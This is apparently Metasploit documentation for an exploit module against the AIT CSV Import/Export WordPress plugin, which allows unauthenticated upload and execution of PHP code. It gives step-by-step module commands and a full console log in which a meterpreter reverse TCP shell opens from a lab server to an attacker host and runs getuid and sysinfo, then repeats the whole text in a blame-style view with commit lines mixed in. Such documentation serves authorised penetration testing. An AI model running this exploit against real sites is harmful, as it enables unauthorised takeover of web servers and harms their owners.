documentation/modules/exploit/multi/http/wp_ait_csv_rce.md

## Vulnerable Application

The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated
remote attackers to upload and execute arbitrary PHP code. The
`upload-handler` does not require authentication, nor validates the
uploaded content. It may return an error when attempting to parse a
CSV, however the uploaded shell is left. The shell is uploaded to
`wp-content/uploads/`.

The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/.
Once uploaded, the plugin does NOT need to be activated to be exploitable, just installed.

## Verification Steps

1. Install the plugin
1. Start msfconsole
1. Do: `use exploits/multi/http/wp_ait_csv_rce`
1. Do: `set rhost [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04.

```
[*] Processing ait.rb for ERB directives.
resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (ait.rb)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (ait.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ait.rb)> check
[*] 2.2.2.2:80 - The target appears to be vulnerable.
resource (ait.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload: W1I6X0.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500
[+] Deleted W1I6X0.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux
```
ait csv improter exploit 2021-01-01 12:14:52 -05:00			`## Vulnerable Application`

spelling 2021-01-09 08:13:19 -05:00			`The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated`
ait csv improter exploit 2021-01-01 12:14:52 -05:00			`remote attackers to upload and execute arbitrary PHP code. The`
			`upload-handler` does not require authentication, nor validates the
spelling 2021-01-09 08:13:19 -05:00			`uploaded content. It may return an error when attempting to parse a`
ait csv improter exploit 2021-01-01 12:14:52 -05:00			`CSV, however the uploaded shell is left. The shell is uploaded to`
			`wp-content/uploads/`.

			`The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/.`
			`Once uploaded, the plugin does NOT need to be activated to be exploitable, just installed.`

			`## Verification Steps`

			`1. Install the plugin`
			`1. Start msfconsole`
			1. Do: `use exploits/multi/http/wp_ait_csv_rce`
			1. Do: `set rhost [ip]`
			1. Do: `set lhost [ip]`
			1. Do: `run`
			`1. You should get a shell.`

			`## Options`

			`## Scenarios`

			`### AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04.`

			```
			`[*] Processing ait.rb for ERB directives.`
			`resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce`
			`[*] Using configured payload php/meterpreter/reverse_tcp`
			`resource (ait.rb)> set rhost 2.2.2.2`
			`rhost => 2.2.2.2`
			`resource (ait.rb)> set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (ait.rb)> check`
			`[*] 2.2.2.2:80 - The target appears to be vulnerable.`
			`resource (ait.rb)> run`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable.`
			`[*] Uploading payload: W1I6X0.php`
			`[*] Triggering payload`
			`[*] Sending stage (39282 bytes) to 2.2.2.2`
			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500`
			`[+] Deleted W1I6X0.php`

			`meterpreter > getuid`
			`Server username: www-data (33)`
			`meterpreter > sysinfo`
			`Computer : wordpress2004`
			`OS : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64`
			`Meterpreter : php/linux`
			```